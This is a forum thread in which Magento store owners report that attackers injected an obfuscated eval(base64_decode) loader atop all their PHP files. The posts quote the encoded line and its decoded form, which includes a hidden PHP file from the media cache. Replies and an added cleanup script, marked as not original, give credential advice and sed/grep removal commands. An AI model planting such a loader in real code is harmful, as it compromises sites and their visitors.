Magento Forum

   
Got hacked - they added a script on top of EVERY single PHP file on my server - please help! 
 
sportgirl
Jr. Member
 
Total Posts:  3
Joined:  2008-12-26
 

My site got hacked .. please helppppp!!!

They added a script on top of all of my php files with the following:
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydt ... (it goes on ...)

which says:
if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/shop/media/catalog/product/cache/8/thumbnail/120x/5e06319eda06f020e43594a9c230972d/images/catalog/product/placeholder/style.css.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}

Luckily it’s the same code / string, so I should be able to run a search and replace for this string.

Do you know a UNIX command to replace this piece of code in multiple files?
How do I clean this piece of code?

I need help!

 
 
Adam Moss
Sr. Member
 
Total Posts:  248
Joined:  2009-02-11
Birmingham, UK
 

It may take a while but you can do a search and replace action in Dreamweaver if you download all the files first. It’s terribly unlucky that you’d get hacked in such a way, perhaps you should move everything to another server/database?

 
 
sportgirl
Jr. Member
 
Total Posts:  3
Joined:  2008-12-26
 
Highwayman - 22 April 2010 10:38 PM

It may take a while but you can do a search and replace action in Dreamweaver if you download all the files first. It’s terribly unlucky that you’d get hacked in such a way, perhaps you should move everything to another server/database?

Thank you. It’s going to take a long time to do this since I have thousands of files.
How do I prevent this from happening again?

 
 
fr0x
Member
 
Total Posts:  59
Joined:  2009-05-20
 

How do I prevent this from happening again?

Change your FTP login credentials immediately. Don’t use an FTP program that stores your password for you (or, more to the point, don’t ever let a login application to your server store the login info... you should enter it manually every time). Make sure your PC is clean of anything malicious. I haven’t yet seen a case where Magento itself was “hacked” but rather it seems to always be the case where the FTP login credentials got compromised.

 
 
wmike
Jr. Member
 
Total Posts:  29
Joined:  2008-06-03
 

The same happened to my website yesterday. I’m on Bluehost and their tech support sucks. Before I found out what was going on, the tech support guys (3 of them) were blaming my Internet Explorer and advising me to change to a different browser!!!
The freshly modified index.php caught my attention, and when I opened it, right at the top was this additional code. Same as yours! Then I randomly checked a few other .php files and it looks like most of the .php files are infected.
My permissions are 755 and 644. Was that the reason it was so easy to breach the security?
It is hard to believe that the attack came from my stored FTP login. The last time I used it was about 5-6 months ago, and my home PC is protected and scanned daily and on access.
Have you found an easy solution to fix it? I can’t imagine looking for each infection and editing it manually.

 
 
yaozer
Jr. Member
 
Total Posts:  27
Joined:  2009-10-12
Shanghai
 

web hosting tech is often not good.

need a script to mass delete them.

comfort.

wmike - 07 May 2010 11:36 AM

The same happened to my website yesterday. I’m on Bluehost and their tech support sucks. Before I found out what was going on, the tech support guys (3 of them) were blaming my Internet Explorer and advising me to change to a different browser!!!
The freshly modified index.php caught my attention, and when I opened it, right at the top was this additional code. Same as yours! Then I randomly checked a few other .php files and it looks like most of the .php files are infected.
My permissions are 755 and 644. Was that the reason it was so easy to breach the security?
It is hard to believe that the attack came from my stored FTP login. The last time I used it was about 5-6 months ago, and my home PC is protected and scanned daily and on access.
Have you found an easy solution to fix it? I can’t imagine looking for each infection and editing it manually.

 
 
SimpleHelixcom
Enthusiast
 
Total Posts:  906
Joined:  2007-08-31
Huntsville, AL
 

I know this is old, but here’s how to wipe out all instances of that script if they exist on one line:

IFS=$'\n'; for i in `grep -lsr <PART_OF_BAD_SCRIPT> *`; do sed -i '/<PART_OF_BAD_SCRIPT>/d' "$i"; done

for example:

IFS=$'\n'; for i in `grep -lsr aWYoZnVuY3Rpb25f *`; do sed -i '/aWYoZnVuY3Rpb25f/d' "$i"; done
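
A more conservative variant of the cleanup above, as an added example that is not part of the original post: it lists affected files first, backs each one up, and strips only the injected tag instead of the whole line, so an original `<?php` sharing that line survives. It also lists PHP files under `media/`, where the decoded stub's include target lives. Assumptions: the stub closes with `'));?>` (the thread truncates it), and the function names and the `.infected.bak` suffix are hypothetical.

```sh
#!/bin/sh
# Added example, not code from the thread. MARKER is the base64 prefix quoted there.
MARKER='aWYoZnVuY3Rpb25f'

# List .php files under $1 that contain the marker (read-only; run this first).
list_infected() {
    # grep exits 1 when a batch has no match, so the status is ignored here
    find "$1" -type f -name '*.php' -exec grep -lF -e "$MARKER" {} + || true
}

# List PHP files under $1/media. The decoded stub includes a style.css.php from
# the media cache, a tree that should hold only images and other static assets.
list_php_in_media() {
    find "$1/media" -type f -name '*.php' 2>/dev/null || true
}

# Strip only the injected tag from one file, keeping a backup beside it.
# Assumed stub shape: <?php /**/eval(base64_decode('<base64>'));?>
clean_file() {
    cp -p -- "$1" "$1.infected.bak" || return 1
    # On marker lines: remove the stub, then drop the line if nothing is left,
    # so no blank line is emitted ahead of the file's real opening tag.
    sed -E "/$MARKER/{
        s#<\?php /\*\*/eval\(base64_decode\(['\"]${MARKER}[A-Za-z0-9+/=]*['\"]\)\);?[[:space:]]*\?>##
        /^[[:space:]]*\$/d
    }" "$1.infected.bak" > "$1.cleaning" || return 1
    # cat into the original keeps its owner and mode
    cat "$1.cleaning" > "$1" && rm -f -- "$1.cleaning"
}

# Clean every infected file under $1, then print how many still carry the
# marker. Non-zero means the stub differs from the assumed shape: inspect by hand.
clean_tree() {
    ct_list=$(mktemp) || return 1
    list_infected "$1" > "$ct_list"
    while IFS= read -r ct_file; do
        clean_file "$ct_file"
    done < "$ct_list"
    rm -f -- "$ct_list"
    list_infected "$1" | wc -l | tr -d ' '
}

# With a directory argument, do a dry run only: report, change nothing.
if [ "$#" -gt 0 ]; then
    list_infected "$1"
    list_php_in_media "$1"
fi
```

Run it with the store root as its only argument for the read-only listing, and call `clean_tree` only after reviewing that list. Any file reported by `list_php_in_media` needs separate inspection, since removing the header stub does not remove the file it includes.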

 
 
louise100
Sr. Member
 
Total Posts:  165
Joined:  2009-01-26
UK
 

hi,

Just out of interest, what version of magento got hacked? Has anyone shed any light on how this happened?
Is this a magento specific problem or a server security problem?

Louise

 